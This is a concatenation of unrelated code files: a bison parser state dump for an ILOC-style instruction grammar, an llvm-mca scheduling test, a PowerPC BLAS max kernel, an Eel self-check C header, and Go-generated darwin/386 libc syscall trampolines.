lshiftI shift, and go to state 23
load shift, and go to state 24
loadAI shift, and go to state 25
loadA0 shift, and go to state 26
loadI shift, and go to state 27
cload shift, and go to state 28
cloadAI shift, and go to state 29
cloadA0 shift, and go to state 30
store shift, and go to state 31
storeAI shift, and go to state 32
storeA0 shift, and go to state 33
cstore shift, and go to state 34
cstoreAI shift, and go to state 35
cstoreA0 shift, and go to state 36
i2i shift, and go to state 37
c2c shift, and go to state 38
c2i shift, and go to state 39
i2c shift, and go to state 40
cmp_LT shift, and go to state 41
cmp_LE shift, and go to state 42
cmp_EQ shift, and go to state 43
cmp_GE shift, and go to state 44
cmp_GT shift, and go to state 45
cmp_NE shift, and go to state 46
jump shift, and go to state 47
jumpI shift, and go to state 48
nop shift, and go to state 49
tbl shift, and go to state 50
inc shift, and go to state 51
dec shift, and go to state 52
add [reduce using rule 2 (p0)]
i go to state 53
i_2_1 go to state 54
i_1_1 go to state 55
i_1_2 go to state 56
i_0_1 go to state 57
i_2_0 go to state 58
op go to state 59
state 5
17 op: add .
$default reduce using rule 17 (op)
state 6
18 op: sub .
$default reduce using rule 18 (op)
state 7
19 op: mult .
$default reduce using rule 19 (op)
state 8
20 op: _div .
$default reduce using rule 20 (op)
state 9
21 op: inv .
$default reduce using rule 21 (op)
state 10
22 op: addI .
$default reduce using rule 22 (op)
state 11
23 op: subI .
$default reduce using rule 23 (op)
state 12
24 op: multI .
$default reduce using rule 24 (op)
state 13
25 op: divI .
$default reduce using rule 25 (op)
state 14
26 op: rdivI .
$default reduce using rule 26 (op)
state 15
27 op: and .
$default reduce using rule 27 (op)
state 16
28 op: andI .
$default reduce using rule 28 (op)
state 17
29 op: or .
$default reduce using rule 29 (op)
state 18
30 op: orI .
$default reduce using rule 30 (op)
state 19
31 op: xor .
$default reduce using rule 31 (op)
state 20
32 op: xorI .
$default reduce using rule 32 (op)
state 21
33 op: lshift .
$default reduce using rule 33 (op)
state 22
35 op: rshift .
$default reduce using rule 35 (op)
state 23
34 op: lshiftI .
$default reduce using rule 34 (op)
state 24
36 op: load .
$default reduce using rule 36 (op)
state 25
37 op: loadAI .
$default reduce using rule 37 (op)
state 26
38 op: loadA0 .
$default reduce using rule 38 (op)
state 27
62 op: loadI .
$default reduce using rule 62 (op)
state 28
39 op: cload .
$default reduce using rule 39 (op)
state 29
40 op: cloadAI .
$default reduce using rule 40 (op)
state 30
41 op: cloadA0 .
$default reduce using rule 41 (op)
state 31
42 op: store .
$default reduce using rule 42 (op)
state 32
43 op: storeAI .
$default reduce using rule 43 (op)
state 33
44 op: storeA0 .
$default reduce using rule 44 (op)
state 34
45 op: cstore .
$default reduce using rule 45 (op)
state 35
46 op: cstoreAI .
$default reduce using rule 46 (op)
state 36
47 op: cstoreA0 .
$default reduce using rule 47 (op)
state 37
48 op: i2i .
$default reduce using rule 48 (op)
state 38
49 op: c2c .
$default reduce using rule 49 (op)
state 39
50 op: c2i .
$default reduce using rule 50 (op)
state 40
51 op: i2c .
$default reduce using rule 51 (op)
state 41
52 op: cmp_LT .
$default reduce using rule 52 (op)
state 42
53 op: cmp_LE .
$default reduce using rule 53 (op)
state 43
54 op: cmp_EQ .
$default reduce using rule 54 (op)
state 44
55 op: cmp_GE .
$default reduce using rule 55 (op)
state 45
56 op: cmp_GT .
$default reduce using rule 56 (op)
state 46
57 op: cmp_NE .
$default reduce using rule 57 (op)
state 47
58 op: jump .
$default reduce using rule 58 (op)
state 48
59 op: jumpI .
$default reduce using rule 59 (op)
state 49
60 op: nop .
$default reduce using rule 60 (op)
state 50
61 op: tbl .
$default reduce using rule 61 (op)
state 51
63 op: inc .
$default reduce using rule 63 (op)
state 52
64 op: dec .
$default reduce using rule 64 (op)
state 53
3 p: p i .
$default reduce using rule 3 (p)
state 54
5 i: i_2_1 .
$default reduce using rule 5 (i)
state 55
6 i: i_1_1 .
$default reduce using rule 6 (i)
state 56
7 i: i_1_2 .
$default reduce using rule 7 (i)
state 57
8 i: i_0_1 .
$default reduce using rule 8 (i)
state 58
9 i: i_2_0 .
$default reduce using rule 9 (i)
state 59
10 i_2_1: op . r comma r to r
11 | op . r comma constant to r
12 i_1_1: op . r to r
13 | op . constant to r
14 i_1_2: op . r to r comma r
15 i_0_1: op . r
16 i_2_0: op . r comma r
r shift, and go to state 60
constant shift, and go to state 61
state 60
10 i_2_1: op r . comma r to r
11 | op r . comma constant to r
12 i_1_1: op r . to r
14 i_1_2: op r . to r comma r
15 i_0_1: op r .
16 i_2_0: op r . comma r
comma shift, and go to state 62
to shift, and go to state 63
$default reduce using rule 15 (i_0_1)
state 61
13 i_1_1: op constant . to r
to shift, and go to state 64
state 62
10 i_2_1: op r comma . r to r
11 | op r comma . constant to r
16 i_2_0: op r comma . r
r shift, and go to state 65
constant shift, and go to state 66
state 63
12 i_1_1: op r to . r
14 i_1_2: op r to . r comma r
r shift, and go to state 67
state 64
13 i_1_1: op constant to . r
r shift, and go to state 68
state 65
10 i_2_1: op r comma r . to r
16 i_2_0: op r comma r .
to shift, and go to state 69
$default reduce using rule 16 (i_2_0)
state 66
11 i_2_1: op r comma constant . to r
to shift, and go to state 70
state 67
12 i_1_1: op r to r .
14 i_1_2: op r to r . comma r
comma shift, and go to state 71
$default reduce using rule 12 (i_1_1)
state 68
13 i_1_1: op constant to r .
$default reduce using rule 13 (i_1_1)
state 69
10 i_2_1: op r comma r to . r
r shift, and go to state 72
state 70
11 i_2_1: op r comma constant to . r
r shift, and go to state 73
state 71
14 i_1_2: op r to r comma . r
r shift, and go to state 74
state 72
10 i_2_1: op r comma r to r .
$default reduce using rule 10 (i_2_1)
state 73
11 i_2_1: op r comma constant to r .
$default reduce using rule 11 (i_2_1)
state 74
14 i_1_2: op r to r comma r .
$default reduce using rule 14 (i_1_2)
| {
"language": "Assembly"
} |
# NOTE: Assertions have been autogenerated by utils/update_mca_test_checks.py
# RUN: llvm-mca -mtriple=x86_64-unknown-unknown -mcpu=bdver2 -iterations=1500 -timeline -timeline-max-iterations=3 < %s | FileCheck %s
# perf stat reports a throughput of 0.60 IPC for this code snippet.
# The lzcnt cannot execute in parallel with the imul because there is a false
# dependency on %bx.
imul %ax, %bx
lzcnt %ax, %bx
add %cx, %bx
# CHECK: Iterations: 1500
# CHECK-NEXT: Instructions: 4500
# CHECK-NEXT: Total Cycles: 9753
# CHECK-NEXT: Total uOps: 6000
# CHECK: Dispatch Width: 4
# CHECK-NEXT: uOps Per Cycle: 0.62
# CHECK-NEXT: IPC: 0.46
# CHECK-NEXT: Block RThroughput: 2.0
# CHECK: Instruction Info:
# CHECK-NEXT: [1]: #uOps
# CHECK-NEXT: [2]: Latency
# CHECK-NEXT: [3]: RThroughput
# CHECK-NEXT: [4]: MayLoad
# CHECK-NEXT: [5]: MayStore
# CHECK-NEXT: [6]: HasSideEffects (U)
# CHECK: [1] [2] [3] [4] [5] [6] Instructions:
# CHECK-NEXT: 1 4 2.00 imulw %ax, %bx
# CHECK-NEXT: 2 2 2.00 lzcntw %ax, %bx
# CHECK-NEXT: 1 1 1.00 addw %cx, %bx
# CHECK: Resources:
# CHECK-NEXT: [0.0] - PdAGLU01
# CHECK-NEXT: [0.1] - PdAGLU01
# CHECK-NEXT: [1] - PdBranch
# CHECK-NEXT: [2] - PdCount
# CHECK-NEXT: [3] - PdDiv
# CHECK-NEXT: [4] - PdEX0
# CHECK-NEXT: [5] - PdEX1
# CHECK-NEXT: [6] - PdFPCVT
# CHECK-NEXT: [7.0] - PdFPFMA
# CHECK-NEXT: [7.1] - PdFPFMA
# CHECK-NEXT: [8.0] - PdFPMAL
# CHECK-NEXT: [8.1] - PdFPMAL
# CHECK-NEXT: [9] - PdFPMMA
# CHECK-NEXT: [10] - PdFPSTO
# CHECK-NEXT: [11] - PdFPU0
# CHECK-NEXT: [12] - PdFPU1
# CHECK-NEXT: [13] - PdFPU2
# CHECK-NEXT: [14] - PdFPU3
# CHECK-NEXT: [15] - PdFPXBR
# CHECK-NEXT: [16.0] - PdLoad
# CHECK-NEXT: [16.1] - PdLoad
# CHECK-NEXT: [17] - PdMul
# CHECK-NEXT: [18] - PdStore
# CHECK: Resource pressure per iteration:
# CHECK-NEXT: [0.0] [0.1] [1] [2] [3] [4] [5] [6] [7.0] [7.1] [8.0] [8.1] [9] [10] [11] [12] [13] [14] [15] [16.0] [16.1] [17] [18]
# CHECK-NEXT: - - - - - 3.00 2.00 - - - - - - - - - - - - - - 2.00 -
# CHECK: Resource pressure by instruction:
# CHECK-NEXT: [0.0] [0.1] [1] [2] [3] [4] [5] [6] [7.0] [7.1] [8.0] [8.1] [9] [10] [11] [12] [13] [14] [15] [16.0] [16.1] [17] [18] Instructions:
# CHECK-NEXT: - - - - - - 1.00 - - - - - - - - - - - - - - 2.00 - imulw %ax, %bx
# CHECK-NEXT: - - - - - 2.00 - - - - - - - - - - - - - - - - - lzcntw %ax, %bx
# CHECK-NEXT: - - - - - 1.00 1.00 - - - - - - - - - - - - - - - - addw %cx, %bx
# CHECK: Timeline view:
# CHECK-NEXT: 0123456789
# CHECK-NEXT: Index 0123456789 01
# CHECK: [0,0] DeeeeER . . .. imulw %ax, %bx
# CHECK-NEXT: [0,1] D===eeER . . .. lzcntw %ax, %bx
# CHECK-NEXT: [0,2] D=====eER . . .. addw %cx, %bx
# CHECK-NEXT: [1,0] .D======eeeeER . .. imulw %ax, %bx
# CHECK-NEXT: [1,1] .D=========eeER. .. lzcntw %ax, %bx
# CHECK-NEXT: [1,2] .D===========eER .. addw %cx, %bx
# CHECK-NEXT: [2,0] . D===========eeeeER.. imulw %ax, %bx
# CHECK-NEXT: [2,1] . D==============eeER. lzcntw %ax, %bx
# CHECK-NEXT: [2,2] . D================eER addw %cx, %bx
# CHECK: Average Wait times (based on the timeline view):
# CHECK-NEXT: [0]: Executions
# CHECK-NEXT: [1]: Average time spent waiting in a scheduler's queue
# CHECK-NEXT: [2]: Average time spent waiting in a scheduler's queue while ready
# CHECK-NEXT: [3]: Average time elapsed from WB until retire stage
# CHECK: [0] [1] [2] [3]
# CHECK-NEXT: 0. 3 6.7 0.7 0.0 imulw %ax, %bx
# CHECK-NEXT: 1. 3 9.7 0.0 0.0 lzcntw %ax, %bx
# CHECK-NEXT: 2. 3 11.7 0.0 0.0 addw %cx, %bx
# CHECK-NEXT: 3 9.3 0.2 0.0 <total>
| {
"language": "Assembly"
} |
/*********************************************************************/
/* Copyright 2009, 2010 The University of Texas at Austin. */
/* All rights reserved. */
/* */
/* Redistribution and use in source and binary forms, with or */
/* without modification, are permitted provided that the following */
/* conditions are met: */
/* */
/* 1. Redistributions of source code must retain the above */
/* copyright notice, this list of conditions and the following */
/* disclaimer. */
/* */
/* 2. Redistributions in binary form must reproduce the above */
/* copyright notice, this list of conditions and the following */
/* disclaimer in the documentation and/or other materials */
/* provided with the distribution. */
/* */
/* THIS SOFTWARE IS PROVIDED BY THE UNIVERSITY OF TEXAS AT */
/* AUSTIN ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, */
/* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF */
/* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE */
/* DISCLAIMED. IN NO EVENT SHALL THE UNIVERSITY OF TEXAS AT */
/* AUSTIN OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, */
/* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES */
/* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE */
/* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR */
/* BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF */
/* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT */
/* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT */
/* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE */
/* POSSIBILITY OF SUCH DAMAGE. */
/* */
/* The views and conclusions contained in the software and */
/* documentation are those of the authors and should not be */
/* interpreted as representing official policies, either expressed */
/* or implied, of The University of Texas at Austin. */
/*********************************************************************/
#define ASSEMBLER
#include "common.h"
#define N r3
#define X r4
#define INCX r5
#define INCX2 r6
#define X2 r7
#define C1 f1
#define C2 f0
#define C3 f2
#define C4 f3
#define A1 f4
#define A2 f5
#define A3 f6
#define A4 f7
#define A5 f8
#define A6 f9
#define A7 f10
#define A8 f11
#define F1 f12
#define F2 f13
#define F3 f14
#define F4 f15
#define F5 f16
#define F6 f17
#define F7 f18
#define F8 f19
#define T1 f20
#define T2 f21
#define T3 f22
#define T4 f23
#define T5 f24
#define T6 f25
#define T7 f26
#define T8 f27
PROLOGUE
PROFCODE
li r10, -16
stfpdux f14, SP, r10
stfpdux f15, SP, r10
stfpdux f16, SP, r10
stfpdux f17, SP, r10
stfpdux f18, SP, r10
stfpdux f19, SP, r10
stfpdux f20, SP, r10
stfpdux f21, SP, r10
stfpdux f22, SP, r10
stfpdux f23, SP, r10
stfpdux f24, SP, r10
stfpdux f25, SP, r10
stfpdux f26, SP, r10
stfpdux f27, SP, r10
li r10, 0
stwu r10, -4(SP)
stwu r10, -4(SP)
stwu r10, -4(SP)
stwu r10, -4(SP)
#ifdef F_INTERFACE
LDINT N, 0(N)
LDINT INCX, 0(INCX)
#endif
lfpdx C1, SP, r10 # Zero clear
slwi INCX, INCX, BASE_SHIFT
add INCX2, INCX, INCX
cmpwi cr0, N, 0
ble LL(999)
cmpwi cr0, INCX, 0
ble LL(999)
LFD C1, 0 * SIZE(X)
add X, X, INCX
addi N, N, -1
cmpwi cr0, N, 0
ble LL(999)
fsmfp C1, C1
fpmr C2, C1
fpmr C3, C1
fpmr C4, C1
cmpwi cr0, INCX, SIZE
bne LL(100)
andi. r0, X, 2 * SIZE - 1
beq LL(05)
LFD C2, 0 * SIZE(X)
add X, X, INCX
addi N, N, -1
cmpwi cr0, N, 0
ble LL(998)
.align 4
LL(05):
sub X, X, INCX2
srawi. r0, N, 4
mtspr CTR, r0
beq- LL(15)
LFPDUX A1, X, INCX2
LFPDUX A2, X, INCX2
LFPDUX A3, X, INCX2
LFPDUX A4, X, INCX2
LFPDUX A5, X, INCX2
LFPDUX A6, X, INCX2
LFPDUX A7, X, INCX2
LFPDUX A8, X, INCX2
bdz LL(13)
.align 4
LL(12):
fpsub F1, C1, A1
fpsub F2, C2, A2
fpsub F3, C3, A3
fpsub F4, C4, A4
fpsel C1, F1, C1, A1
LFPDUX A1, X, INCX2
fpsel C2, F2, C2, A2
LFPDUX A2, X, INCX2
fpsel C3, F3, C3, A3
LFPDUX A3, X, INCX2
fpsel C4, F4, C4, A4
LFPDUX A4, X, INCX2
fpsub F5, C1, A5
fpsub F6, C2, A6
fpsub F7, C3, A7
fpsub F8, C4, A8
fpsel C1, F5, C1, A5
LFPDUX A5, X, INCX2
fpsel C2, F6, C2, A6
LFPDUX A6, X, INCX2
fpsel C3, F7, C3, A7
LFPDUX A7, X, INCX2
fpsel C4, F8, C4, A8
LFPDUX A8, X, INCX2
bdnz LL(12)
.align 4
LL(13):
fpsub F1, C1, A1
fpsub F2, C2, A2
fpsub F3, C3, A3
fpsub F4, C4, A4
fpsel C1, F1, C1, A1
fpsel C2, F2, C2, A2
fpsel C3, F3, C3, A3
fpsel C4, F4, C4, A4
fpsub F5, C1, A5
fpsub F6, C2, A6
fpsub F7, C3, A7
fpsub F8, C4, A8
fpsel C1, F5, C1, A5
fpsel C2, F6, C2, A6
fpsel C3, F7, C3, A7
fpsel C4, F8, C4, A8
.align 4
LL(15):
andi. r0, N, 15
beq LL(998)
andi. r0, N, 8
beq LL(16)
LFPDUX A1, X, INCX2
LFPDUX A2, X, INCX2
LFPDUX A3, X, INCX2
LFPDUX A4, X, INCX2
fpsub F1, C1, A1
fpsub F2, C2, A2
fpsub F3, C3, A3
fpsub F4, C4, A4
fpsel C1, F1, C1, A1
fpsel C2, F2, C2, A2
fpsel C3, F3, C3, A3
fpsel C4, F4, C4, A4
.align 4
LL(16):
andi. r0, N, 4
beq LL(17)
LFPDUX A1, X, INCX2
LFPDUX A2, X, INCX2
fpsub F1, C1, A1
fpsub F2, C2, A2
fpsel C1, F1, C1, A1
fpsel C2, F2, C2, A2
.align 4
LL(17):
andi. r0, N, 2
beq LL(18)
LFPDUX A1, X, INCX2
fpsub F1, C1, A1
fpsel C1, F1, C1, A1
.align 4
LL(18):
andi. r0, N, 1
beq LL(998)
LFDUX A1, X, INCX2
fsub F1, C1, A1
fsel C1, F1, C1, A1
b LL(998)
.align 4
LL(100):
sub X, X, INCX
srawi. r0, N, 4
mtspr CTR, r0
beq- LL(105)
LFDUX A1, X, INCX
LFDUX A2, X, INCX
LFDUX A3, X, INCX
LFDUX A4, X, INCX
LFSDUX A1, X, INCX
LFSDUX A2, X, INCX
LFSDUX A3, X, INCX
LFSDUX A4, X, INCX
LFDUX A5, X, INCX
LFDUX A6, X, INCX
LFDUX A7, X, INCX
LFDUX A8, X, INCX
LFSDUX A5, X, INCX
LFSDUX A6, X, INCX
LFSDUX A7, X, INCX
LFSDUX A8, X, INCX
fpsub F1, C1, A1
fpsub F2, C2, A2
fpsub F3, C3, A3
fpsub F4, C4, A4
bdz LL(103)
.align 4
LL(102):
fpsel C1, F1, C1, A1
LFDUX A1, X, INCX
fpsel C2, F2, C2, A2
LFDUX A2, X, INCX
fpsel C3, F3, C3, A3
LFDUX A3, X, INCX
fpsel C4, F4, C4, A4
LFDUX A4, X, INCX
fpsub F5, C1, A5
LFSDUX A1, X, INCX
fpsub F6, C2, A6
LFSDUX A2, X, INCX
fpsub F7, C3, A7
LFSDUX A3, X, INCX
fpsub F8, C4, A8
LFSDUX A4, X, INCX
fpsel C1, F5, C1, A5
LFDUX A5, X, INCX
fpsel C2, F6, C2, A6
LFDUX A6, X, INCX
fpsel C3, F7, C3, A7
LFDUX A7, X, INCX
fpsel C4, F8, C4, A8
LFDUX A8, X, INCX
fpsub F1, C1, A1
LFSDUX A5, X, INCX
fpsub F2, C2, A2
LFSDUX A6, X, INCX
fpsub F3, C3, A3
LFSDUX A7, X, INCX
fpsub F4, C4, A4
LFSDUX A8, X, INCX
bdnz LL(102)
.align 4
LL(103):
fpsel C1, F1, C1, A1
fpsel C2, F2, C2, A2
fpsel C3, F3, C3, A3
fpsel C4, F4, C4, A4
fpsub F5, C1, A5
fpsub F6, C2, A6
fpsub F7, C3, A7
fpsub F8, C4, A8
fpsel C1, F5, C1, A5
fpsel C2, F6, C2, A6
fpsel C3, F7, C3, A7
fpsel C4, F8, C4, A8
.align 4
LL(105):
andi. r0, N, 15
beq LL(998)
andi. r0, N, 8
beq LL(106)
LFDUX A1, X, INCX
LFDUX A2, X, INCX
LFDUX A3, X, INCX
LFDUX A4, X, INCX
LFSDUX A1, X, INCX
LFSDUX A2, X, INCX
LFSDUX A3, X, INCX
LFSDUX A4, X, INCX
fpsub F1, C1, A1
fpsub F2, C2, A2
fpsub F3, C3, A3
fpsub F4, C4, A4
fpsel C1, F1, C1, A1
fpsel C2, F2, C2, A2
fpsel C3, F3, C3, A3
fpsel C4, F4, C4, A4
.align 4
LL(106):
andi. r0, N, 4
beq LL(107)
LFDUX A1, X, INCX
LFDUX A2, X, INCX
LFDUX A3, X, INCX
LFDUX A4, X, INCX
fsub F1, C1, A1
fsub F2, C2, A2
fsub F3, C3, A3
fsub F4, C4, A4
fsel C1, F1, C1, A1
fsel C2, F2, C2, A2
fsel C3, F3, C3, A3
fsel C4, F4, C4, A4
.align 4
LL(107):
andi. r0, N, 2
beq LL(108)
LFDUX A1, X, INCX
LFDUX A2, X, INCX
fsub F1, C1, A1
fsub F2, C2, A2
fsel C1, F1, C1, A1
fsel C2, F2, C2, A2
.align 4
LL(108):
andi. r0, N, 1
beq LL(998)
LFDUX A1, X, INCX
fsub F1, C1, A1
fsel C1, F1, C1, A1
.align 4
LL(998):
fpsub F1, C1, C2
fpsub F2, C3, C4
fpsel C1, F1, C1, C2
fpsel C3, F2, C3, C4
fpsub F1, C1, C3
fpsel C1, F1, C1, C3
fsmtp C2, C1
fsub F1, C1, C2
fsel C1, F1, C1, C2
.align 4
LL(999):
li r10, 16
lfpdux f27, SP, r10
lfpdux f26, SP, r10
lfpdux f25, SP, r10
lfpdux f24, SP, r10
lfpdux f23, SP, r10
lfpdux f22, SP, r10
lfpdux f21, SP, r10
lfpdux f20, SP, r10
lfpdux f19, SP, r10
lfpdux f18, SP, r10
lfpdux f17, SP, r10
lfpdux f16, SP, r10
lfpdux f15, SP, r10
lfpdux f14, SP, r10
addi SP, SP, 16
blr
EPILOGUE
| {
"language": "Assembly"
} |
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 8; tab-width: 8 -*-
eel-lib-self-check-functions.h: Wrapper and prototypes for all
self-check functions in libeel.
Copyright (C) 2000 Eazel, Inc.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU Library General Public License as
published by the Free Software Foundation; either version 2 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Library General Public License for more details.
You should have received a copy of the GNU Library General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
Boston, MA 02110-1301, USA.
Author: Darin Adler <[email protected]>
*/
#ifndef __EEL_LIB_SELF_CHECK_FUNCTIONS_H__
#define __EEL_LIB_SELF_CHECK_FUNCTIONS_H__
#include "eel-self-checks.h"
void eel_run_lib_self_checks (void);
/* Putting the prototypes for these self-check functions in each
header file for the files they are defined in would make compiling
the self-check framework take way too long (since one file would
have to include everything).
So we put the list of functions here instead.
Instead of just putting prototypes here, we put this macro that
can be used to do operations on the whole list of functions.
*/
#define EEL_LIB_FOR_EACH_SELF_CHECK_FUNCTION(macro) \
macro (eel_self_check_background) \
macro (eel_self_check_gdk_extensions) \
macro (eel_self_check_glib_extensions) \
macro (eel_self_check_string) \
/* Add new self-check functions to the list above this line. */
/* Generate prototypes for all the functions. */
EEL_LIB_FOR_EACH_SELF_CHECK_FUNCTION (EEL_SELF_CHECK_FUNCTION_PROTOTYPE)
#endif /* __EEL_LIB_SELF_CHECK_FUNCTIONS_H__ */
| {
"language": "Assembly"
} |
// go run mkasm_darwin.go 386
// Code generated by the command above; DO NOT EDIT.
// +build go1.12
#include "textflag.h"
TEXT ·libc_getgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgroups(SB)
TEXT ·libc_setgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgroups(SB)
TEXT ·libc_wait4_trampoline(SB),NOSPLIT,$0-0
JMP libc_wait4(SB)
TEXT ·libc_accept_trampoline(SB),NOSPLIT,$0-0
JMP libc_accept(SB)
TEXT ·libc_bind_trampoline(SB),NOSPLIT,$0-0
JMP libc_bind(SB)
TEXT ·libc_connect_trampoline(SB),NOSPLIT,$0-0
JMP libc_connect(SB)
TEXT ·libc_socket_trampoline(SB),NOSPLIT,$0-0
JMP libc_socket(SB)
TEXT ·libc_getsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockopt(SB)
TEXT ·libc_setsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsockopt(SB)
TEXT ·libc_getpeername_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpeername(SB)
TEXT ·libc_getsockname_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockname(SB)
TEXT ·libc_shutdown_trampoline(SB),NOSPLIT,$0-0
JMP libc_shutdown(SB)
TEXT ·libc_socketpair_trampoline(SB),NOSPLIT,$0-0
JMP libc_socketpair(SB)
TEXT ·libc_recvfrom_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvfrom(SB)
TEXT ·libc_sendto_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendto(SB)
TEXT ·libc_recvmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvmsg(SB)
TEXT ·libc_sendmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendmsg(SB)
TEXT ·libc_kevent_trampoline(SB),NOSPLIT,$0-0
JMP libc_kevent(SB)
TEXT ·libc___sysctl_trampoline(SB),NOSPLIT,$0-0
JMP libc___sysctl(SB)
TEXT ·libc_utimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_utimes(SB)
TEXT ·libc_futimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_futimes(SB)
TEXT ·libc_fcntl_trampoline(SB),NOSPLIT,$0-0
JMP libc_fcntl(SB)
TEXT ·libc_poll_trampoline(SB),NOSPLIT,$0-0
JMP libc_poll(SB)
TEXT ·libc_madvise_trampoline(SB),NOSPLIT,$0-0
JMP libc_madvise(SB)
TEXT ·libc_mlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlock(SB)
TEXT ·libc_mlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlockall(SB)
TEXT ·libc_mprotect_trampoline(SB),NOSPLIT,$0-0
JMP libc_mprotect(SB)
TEXT ·libc_msync_trampoline(SB),NOSPLIT,$0-0
JMP libc_msync(SB)
TEXT ·libc_munlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlock(SB)
TEXT ·libc_munlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlockall(SB)
TEXT ·libc_ptrace_trampoline(SB),NOSPLIT,$0-0
JMP libc_ptrace(SB)
TEXT ·libc_getattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_getattrlist(SB)
TEXT ·libc_pipe_trampoline(SB),NOSPLIT,$0-0
JMP libc_pipe(SB)
TEXT ·libc_getxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_getxattr(SB)
TEXT ·libc_fgetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fgetxattr(SB)
TEXT ·libc_setxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_setxattr(SB)
TEXT ·libc_fsetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsetxattr(SB)
TEXT ·libc_removexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_removexattr(SB)
TEXT ·libc_fremovexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fremovexattr(SB)
TEXT ·libc_listxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_listxattr(SB)
TEXT ·libc_flistxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_flistxattr(SB)
TEXT ·libc_setattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_setattrlist(SB)
TEXT ·libc_kill_trampoline(SB),NOSPLIT,$0-0
JMP libc_kill(SB)
TEXT ·libc_ioctl_trampoline(SB),NOSPLIT,$0-0
JMP libc_ioctl(SB)
TEXT ·libc_sendfile_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendfile(SB)
TEXT ·libc_access_trampoline(SB),NOSPLIT,$0-0
JMP libc_access(SB)
TEXT ·libc_adjtime_trampoline(SB),NOSPLIT,$0-0
JMP libc_adjtime(SB)
TEXT ·libc_chdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_chdir(SB)
TEXT ·libc_chflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_chflags(SB)
TEXT ·libc_chmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_chmod(SB)
TEXT ·libc_chown_trampoline(SB),NOSPLIT,$0-0
JMP libc_chown(SB)
TEXT ·libc_chroot_trampoline(SB),NOSPLIT,$0-0
JMP libc_chroot(SB)
TEXT ·libc_close_trampoline(SB),NOSPLIT,$0-0
JMP libc_close(SB)
TEXT ·libc_dup_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup(SB)
TEXT ·libc_dup2_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup2(SB)
TEXT ·libc_exchangedata_trampoline(SB),NOSPLIT,$0-0
JMP libc_exchangedata(SB)
TEXT ·libc_exit_trampoline(SB),NOSPLIT,$0-0
JMP libc_exit(SB)
TEXT ·libc_faccessat_trampoline(SB),NOSPLIT,$0-0
JMP libc_faccessat(SB)
TEXT ·libc_fchdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchdir(SB)
TEXT ·libc_fchflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchflags(SB)
TEXT ·libc_fchmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmod(SB)
TEXT ·libc_fchmodat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmodat(SB)
TEXT ·libc_fchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchown(SB)
TEXT ·libc_fchownat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchownat(SB)
TEXT ·libc_flock_trampoline(SB),NOSPLIT,$0-0
JMP libc_flock(SB)
TEXT ·libc_fpathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_fpathconf(SB)
TEXT ·libc_fsync_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsync(SB)
TEXT ·libc_ftruncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_ftruncate(SB)
TEXT ·libc_getdtablesize_trampoline(SB),NOSPLIT,$0-0
JMP libc_getdtablesize(SB)
TEXT ·libc_getegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getegid(SB)
TEXT ·libc_geteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_geteuid(SB)
TEXT ·libc_getgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgid(SB)
TEXT ·libc_getpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgid(SB)
TEXT ·libc_getpgrp_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgrp(SB)
